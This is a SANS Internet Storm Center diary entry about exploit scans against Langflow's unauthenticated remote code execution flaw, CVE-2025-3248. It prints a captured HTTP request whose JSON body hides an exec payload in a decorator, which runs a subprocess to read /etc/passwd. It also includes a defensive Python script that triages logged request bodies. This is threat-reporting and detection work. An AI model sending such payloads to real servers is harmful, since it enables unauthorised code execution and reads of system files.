Exploit Attempts for Recent Langflow AI Vulnerability (CVE-2025-3248), (Sat, Apr 12th)
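Shortly after Langflow 1.3.0 was released, a major security vulnerability allowing unauthenticated remote code execution came to light. Attackers use a specific API endpoint to obtain sensitive system information. After public disclosure the vulnerability was quickly exploited, with attack requests coming mainly from TOR nodes. 2025-4-13 00:21:28 Author: isc.sans.edu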

Two weeks ago, version 1.3.0 of Langflow was released. The release notes list many fixes but do not mention that one of the "Bug Fixes" addresses a major vulnerability. Instead, the release notes state, "auth current user on code validation." [1]

Its website states, "Langflow is a low-code tool for developers that makes it easier to build powerful AI agents and workflows that can use any API, model, or database." It can be installed as a Python package, a standalone desktop application, or as a cloud-hosted service. DataStax provides a ready-built cloud-hosted environment for Langflow.

The vulnerability went somewhat unnoticed, at least by me, until Horizon3 created a detailed writeup showing how easy it is to exploit the vulnerability and providing a proof-of-concept exploit. Horizon3 published its blog on April 9th [2]. We saw a first hit to the vulnerable URL, "/api/v1/validate/code", on April 10th. Today (April 12th), we saw a significant increase in hits for this URL.

The requests we are seeing are vulnerability scans. They attempt to retrieve the content of "/etc/passwd" to verify if the target system:

POST /api/v1/validate/code HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4
Connection: close
Content-Length: 125
Content-Type: application/json
Accept-Encoding: gzip

{"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"cat\", \"/etc/passwd\"]))')\ndef foo():\n  pass"}
 

Not all of our honeypots report request bodies, and so far this is the only request body we have recorded. All of the requests so far originate from TOR exit nodes.
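
For sensors or proxies that do record request bodies, the following added example (not code from this diary, Langflow, or Horizon3) triages a logged request by parsing the "code" field with Python's ast module, without executing it, and reporting calls that would run at definition time. It generalizes from the decorator seen in the recorded body to argument defaults as well, since Python evaluates both when a def statement runs. The method/path/body log fields and the function names are assumptions.

```python
import ast
import json

VALIDATE_PATH = "/api/v1/validate/code"  # endpoint named in the diary


def definition_time_calls(source):
    """List call expressions Python would evaluate while *defining* the
    functions and classes in `source`: decorators and argument defaults.
    Only ast.parse is used; the submitted code is never executed."""
    try:
        tree = ast.parse(source)
    except (SyntaxError, ValueError):
        return ["unparseable code field"]
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            kw = [d for d in node.args.kw_defaults if d is not None]
            exprs = node.decorator_list + node.args.defaults + kw
        elif isinstance(node, ast.ClassDef):
            exprs = list(node.decorator_list)
        else:
            continue
        for expr in exprs:
            if any(isinstance(n, ast.Call) for n in ast.walk(expr)):
                hits.append(f"{node.name}: {ast.unparse(expr)}")
    return hits


def triage_request(method, path, body):
    """Return findings for one logged request (hypothetical log fields)."""
    if method.upper() != "POST" or path.split("?")[0].rstrip("/") != VALIDATE_PATH:
        return []
    try:
        code = json.loads(body)["code"]
    except (ValueError, KeyError, TypeError):
        return ["malformed body sent to validate endpoint"]
    if not isinstance(code, str):
        return ["non-string code field"]
    return definition_time_calls(code)


# Request body as recorded in the diary, plus a constructed benign body.
DIARY_BODY = r'''{"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"cat\", \"/etc/passwd\"]))')\ndef foo():\n  pass"}'''
BENIGN_BODY = r'{"code": "def foo(x, y=1):\n  return x + y"}'

if __name__ == "__main__":
    for body in (DIARY_BODY, BENIGN_BODY):
        print(triage_request("POST", VALIDATE_PATH, body))
```

An empty list only means no definition-time call was found in the body; it is a triage signal, not proof that a request was benign.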

[1] https://github.com/langflow-ai/langflow/releases/tag/1.3.0
[2] https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu


Source: https://isc.sans.edu/diary/rss/31850